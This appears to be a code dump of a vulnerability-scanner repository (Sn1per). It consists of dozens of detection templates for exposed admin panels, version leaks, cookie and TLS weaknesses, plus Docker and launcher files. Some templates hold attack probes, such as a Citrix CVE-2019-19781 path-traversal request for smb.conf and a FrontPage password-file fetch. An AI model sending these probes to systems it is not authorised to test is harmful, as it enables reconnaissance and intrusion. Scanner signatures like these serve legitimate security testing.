2 | VULN_NAME='phpMyAdmin Detected'
3 | URI='/phpmyadmin/'
4 | METHOD='GET'
5 | MATCH='<title>phpMyAdmin '
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/web/Autocomplete_Enabled.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Autocomplete Enabled'
3 | FILENAME="$LOOT_DIR/web/websource-htt*-$TARGET-*.txt"
4 | MATCH='autocomplete=\"on\"'
5 | SEVERITY='P4 - LOW'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/X-Powered-By_Header_Found.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='X-Powered-By Header Found'
3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
4 | MATCH='X-Powered-By'
5 | SEVERITY='P5 - INFO'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/active/Drupal_User_Login.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Drupal User Login'
3 | URI='/user/login?destination=/'
4 | METHOD='GET'
5 | MATCH='user-login-form'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Jetty_Version_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Jetty Version Disclosure Detected'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH='Powered by Jetty'
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/SQLiteManager_Scanner_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='SQLiteManager Detected'
3 | URI='/sqlite/'
4 | METHOD='GET'
5 | MATCH='<title>SQLiteManager'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/cPanel_Login_Found_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='cPanel Login Found 2'
3 | URI=':2083/'
4 | METHOD='GET'
5 | MATCH="cPanel\ Login"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS=''
10 |
--------------------------------------------------------------------------------
/templates/passive/web/Expired_SSL_Certificate.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Expired SSL Certificate'
3 | FILENAME="$LOOT_DIR/web/curldebug-$TARGET-*.txt"
4 | MATCH='certificate has expired'
5 | SEVERITY='P3 - MEDIUM'
6 | GREP_OPTIONS=''
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/active/Cisco_VPN_Login_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Cisco VPN Login Detected'
3 | URI='/+CSCOE+/logon.html'
4 | METHOD='GET'
5 | MATCH="CSCO_Format"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Jaspersoft_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Jaspersoft Detected'
3 | URI='/jasperserver/login.html?error=1'
4 | METHOD='GET'
5 | MATCH="Jaspersoft"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Jira_Scanner_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Jira Detected 1'
3 | URI='/secure/Dashboard.jspa'
4 | METHOD='GET'
5 | MATCH='Project Management Software'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Jolokia_Version_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Jolokia Version Disclosure'
3 | URI='/jolokia/version'
4 | METHOD='GET'
5 | MATCH="\"agent\"\:"
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Robots.txt_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Robots.txt Detected'
3 | URI='/robots.txt'
4 | METHOD='GET'
5 | MATCH='Disallow\:|Allow\:|Sitemap\:'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/SolarWinds_Orion_Panel.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='SolarWinds Orion Panel'
3 | URI='/Orion/Login.aspx'
4 | METHOD='GET'
5 | MATCH="SolarWinds\ Orion"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Tiki_Wiki_CMS_Groupware_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Tiki Wiki CMS Groupware'
3 | URI='/tiki-login.php'
4 | METHOD='GET'
5 | MATCH="Groupware"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Directory_Listing_Enabled.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Directory Listing Enabled'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH="Index\ of|To\ Parent\ Directory"
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Jira_Scanner_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Jira Detected 2'
3 | URI='/jira/secure/Dashboard.jspa'
4 | METHOD='GET'
5 | MATCH='Project Management Software'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/PHP_Composer_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='PHP Composer Disclosure'
3 | URI='/composer.json'
4 | METHOD='GET'
5 | MATCH='repositories|require-dev'
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/TeamQuest_Login_Found.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='TeamQuest Login Found'
3 | URI='/teamquest/cgi-bin/login'
4 | METHOD='GET'
5 | MATCH="TeamQuest\ \-\ Login"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/Lack_of_SPF_DNS_Record.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Lack of SPF DNS Record'
3 | FILENAME="$LOOT_DIR/nmap/email-$TARGET.txt"
4 | MATCH="\[\+\]\ Spoofing\ possible"
5 | SEVERITY='P4 - LOW'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE='network'
--------------------------------------------------------------------------------
/templates/passive/network/Subjack_Takeover_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Subjack Takeover Detected'
3 | FILENAME="$LOOT_DIR/nmap/subjack-$TARGET.txt"
4 | MATCH="\[Vulnerable\]"
5 | SEVERITY='P2 - HIGH'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE="network"
--------------------------------------------------------------------------------
/templates/active/Citrix-Access-Gateway_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Citrix-Access-Gateway Detected'
3 | URI='/vpn/index.html'
4 | METHOD='GET'
5 | MATCH='Netscaler Gateway'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Drupal_Install_Found.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Drupal Install Found'
3 | URI='/install.php?profile=default'
4 | METHOD='GET'
5 | MATCH='Choose language | Drupal'
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Drupal_Version_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Drupal Version Disclosure'
3 | URI='/core/install.php?profile=default'
4 | METHOD='GET'
5 | MATCH='site-version'
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/PulseSecure_VPN_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='PulseSecure VPN Detected'
3 | URI='/dana-na/auth/url_admin/welcome.cgi'
4 | METHOD='GET'
5 | MATCH='<title>SSL'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/Subover_Takeover_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Subover Takeover Detected'
3 | FILENAME="$LOOT_DIR/nmap/subover-$TARGET.txt"
4 | MATCH="Takeover\ Possible"
5 | SEVERITY='P2 - HIGH'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE="network"
--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3.9'
2 |
3 | x-logging: &default-logging
4 | options:
5 | max-size: "40m"
6 | max-file: "10"
7 | driver: json-file
8 |
9 | services:
10 | kali-linux:
11 | container_name: kali-linux
12 | build:
13 | context: .
14 | dockerfile: Dockerfile
15 |
--------------------------------------------------------------------------------
/templates/active/Jira_Scanner_3.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Jira Detected'
3 | URI='/secure/ContactAdministrators!default.jspa'
4 | METHOD='GET'
5 | MATCH='Project Management Software'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Unauthenticated_Jenkins_Dashboard_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Unauthenticated Jenkins Dashboard Detected'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH="\[Jenkins\]"
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/SSH_Version_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='SSH Version Disclosure'
3 | FILENAME="$LOOT_DIR/output/msf-$TARGET-*-ssh_version.txt"
4 | MATCH="\[\+\]"
5 | SEVERITY='P4 - LOW'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE="network"
10 |
--------------------------------------------------------------------------------
/templates/passive/web/Insecure_SSL_TLS_Connection.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Weak SSL TLS Protocols'
3 | FILENAME="$LOOT_DIR/web/sslscan-$TARGET.txt $LOOT_DIR/web/sslscan-$TARGET-*.txt"
4 | MATCH="SSLv* enabled"
5 | SEVERITY='P2 - HIGH'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/active/Frontpage_Service_Password_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Frontpage Service Password Disclosure'
3 | URI='/_vti_pvt/service.pwd'
4 | METHOD='GET'
5 | MATCH=' Frontpage'
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Mailman_Version_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Mailman Version Disclosure'
3 | URI='/mailman/listinfo'
4 | METHOD='GET'
5 | MATCH="Delivered\ by\ Mailman"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS=''
10 |
--------------------------------------------------------------------------------
/templates/active/RabbitMQ_Management_Interface_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='RabbitMQ Management Interface Detected'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH="<title>RabbitMQ Management"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Weblogic_Application_Server_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Weblogic Application Server Detected'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH="Weblogic\ Application\ Server"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/web/CORS_Policy_-_Allow-Origin_Wildcard.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CORS Policy - Allow-Origin Wildcard'
3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
4 | MATCH='Access-Control-Allow-Origin: *'
5 | SEVERITY='P4 - LOW'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/Insecure_Cookie_-_Secure_Not_Set.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Insecure Cookie - Secure Not Set'
3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
4 | MATCH='Set-Cookie'
5 | SEVERITY='P3 - MEDIUM'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=' | egrep -iv secure'
--------------------------------------------------------------------------------
/templates/passive/web/Interesting_Title_Found.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Interesting Title Found'
3 | FILENAME="$LOOT_DIR/web/title-htt*-$TARGET-*.txt"
4 | MATCH='admin|dev|portal|login|sign|signup|registration|account'
5 | SEVERITY='P5 - INFO'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/active/Joomla_Version_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Joomla Version Disclosure'
3 | URI='/administrator/manifests/files/joomla.xml'
4 | METHOD='GET'
5 | MATCH="Joomla\ version\ "
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/web/Insecure_Cookie_-_HTTPOnly_Not_Set.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Insecure Cookie - HTTPOnly Not Set'
3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
4 | MATCH='Set-Cookie'
5 | SEVERITY='P3 - MEDIUM'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=' | egrep -iv httponly'
--------------------------------------------------------------------------------
/templates/active/Apache_Tomcat_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Apache Tomcat Detected'
3 | URI='/404_DOES_NOT_EXIST'
4 | METHOD='GET'
5 | MATCH="Apache\ Tomcat\/[0-9]?[0-9]\.[0-9]?[0-9]\.[0-9]?[0-9]"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-o'
--------------------------------------------------------------------------------
/templates/active/Common_Status_File_Scanner_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Common Status File Detected 1'
3 | URI='/.perf'
4 | METHOD='GET'
5 | MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/MS_SQL_Reporting_Server_Scanner_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='MS SQL Reporting Server Detected 2'
3 | URI='/Reports/Pages/Folder.aspx'
4 | METHOD='GET'
5 | MATCH='Microsoft\.Reporting'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/docker-compose-blackarch.yml:
--------------------------------------------------------------------------------
1 | version: '3.9'
2 |
3 | x-logging: &default-logging
4 | options:
5 | max-size: "40m"
6 | max-file: "10"
7 | driver: json-file
8 |
9 | services:
10 | blackarch:
11 | container_name: blackarch
12 | build:
13 | context: .
14 | dockerfile: Dockerfile.blackarch
15 |
--------------------------------------------------------------------------------
/templates/active/Common_Status_File_Scanner_3.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Common Status File Detected 3'
3 | URI='/status.html'
4 | METHOD='GET'
5 | MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Fortigate_Pulse_Connect_Secure_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Fortigate Pulse Connect Secure Detected'
3 | URI='/remote/login?lang=en'
4 | METHOD='GET'
5 | MATCH='<title>Please Login'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected'
3 | URI='/remote/login?lang=en'
4 | METHOD='GET'
5 | MATCH="launchFortiClient"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-7246 - qdPM Authenticated Remote Code Execution'
3 | URI="/"
4 | METHOD='GET'
5 | MATCH='qdPM 9.'
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Common_Status_File_Scanner_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Common Status File Detected 2'
3 | URI='/server-status'
4 | METHOD='GET'
5 | MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 1'
3 | URI='/remote/login?lang=en'
4 | METHOD='GET'
5 | MATCH="launchFortiClient"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/MS_SQL_Reporting_Server_Scanner_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='MS SQL Reporting Server Detected 1'
3 | URI='/ReportServer/pages/ReportViewer.aspx'
4 | METHOD='GET'
5 | MATCH='Microsoft\.Reporting'
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/web/CORS_Policy_-_Allow-Credentials_Enabled.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CORS Policy - Allow-Credentials Enabled'
3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
4 | MATCH='Access-Control-Allow-Credentials: true'
5 | SEVERITY='P4 - LOW'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/active/CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-7192 - QNAP Pre-Auth Root RCE'
3 | URI='/photo/p/api/video.php'
4 | METHOD='GET'
5 | MATCH="\[\ 401\ Unauthorized\ \]"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 2'
3 | URI=':10443/remote/login?lang=en'
4 | METHOD='GET'
5 | MATCH="launchFortiClient"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 3'
3 | URI=':4443/remote/login?lang=en'
4 | METHOD='GET'
5 | MATCH="launchFortiClient"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/Default_Credentials_NMap.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Default Credentials - NMap'
3 | FILENAME="$LOOT_DIR/output/nmap-$TARGET.txt $LOOT_DIR/output/nmap-$TARGET-*.txt"
4 | MATCH="Valid\ credentials"
5 | SEVERITY='P1 - CRITICAL'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE="network"
--------------------------------------------------------------------------------
/templates/passive/network/Interesting_Domain_Found.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Interesting Domain Found'
3 | echo "$TARGET" > /tmp/target
4 | FILENAME="/tmp/target"
5 | MATCH="admin|dev|portal|stage|prod|tst|test"
6 | SEVERITY='P5 - INFO'
7 | GREP_OPTIONS='-i'
8 | SEARCH='positive'
9 | SECONDARY_COMMANDS=''
10 | TYPE='network'
--------------------------------------------------------------------------------
/templates/passive/network/SMB_Info_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='SMB Info Disclosure'
3 | FILENAME="$LOOT_DIR/output/msf-$TARGET-port139.txt $LOOT_DIR/output/msf-$TARGET-port445.txt"
4 | MATCH="\[\+\]"
5 | SEVERITY='P4 - LOW'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE="network"
10 |
--------------------------------------------------------------------------------
/templates/passive/web/Clear-text_Communications_HTTP.sh:
--------------------------------------------------------------------------------
1 | if [ "$SSL" = "false" ]; then
2 | AUTHOR='@xer0dayz'
3 | VULN_NAME='Clear-Text Protocol - HTTP'
4 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET-*.txt"
5 | MATCH="200\ OK"
6 | SEVERITY='P2 - HIGH'
7 | GREP_OPTIONS='-i'
8 | SEARCH='positive'
9 | SECONDARY_COMMANDS=''
10 | fi
--------------------------------------------------------------------------------
/templates/passive/web/Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Passive Detection'
3 | FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET-*.txt"
4 | MATCH="Server\:\ xxxxxxxx-xxxxx"
5 | SEVERITY='P5 - INFO'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/sn1per.desktop:
--------------------------------------------------------------------------------
1 | [Desktop Entry]
2 | Name=sn1per
3 | Encoding=UTF-8
4 | Exec=bash-wrapper "sudo sniper"
5 | Icon=/usr/share/pixmaps/sn1per.png
6 | StartupNotify=false
7 | Terminal=true
8 | Type=Application
9 | Categories=08-exploitation-tools;02-vulnerability-analysis;01-info-gathering;
10 | X-Kali-Package=sn1per
11 | Comment=
12 | Path=
13 |
--------------------------------------------------------------------------------
/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal'
3 | URI='/vpn/../vpns/cfg/smb.conf'
4 | METHOD='GET'
5 | MATCH='\[global\]'
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/CVE-2018-15473_-_OpenSSH_Username_Enumeration.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2018-15473 - OpenSSH Username Enumeration'
3 | FILENAME="$LOOT_DIR/output/msf-$TARGET-*-ssh_enumusers.txt"
4 | MATCH="\[+\]"
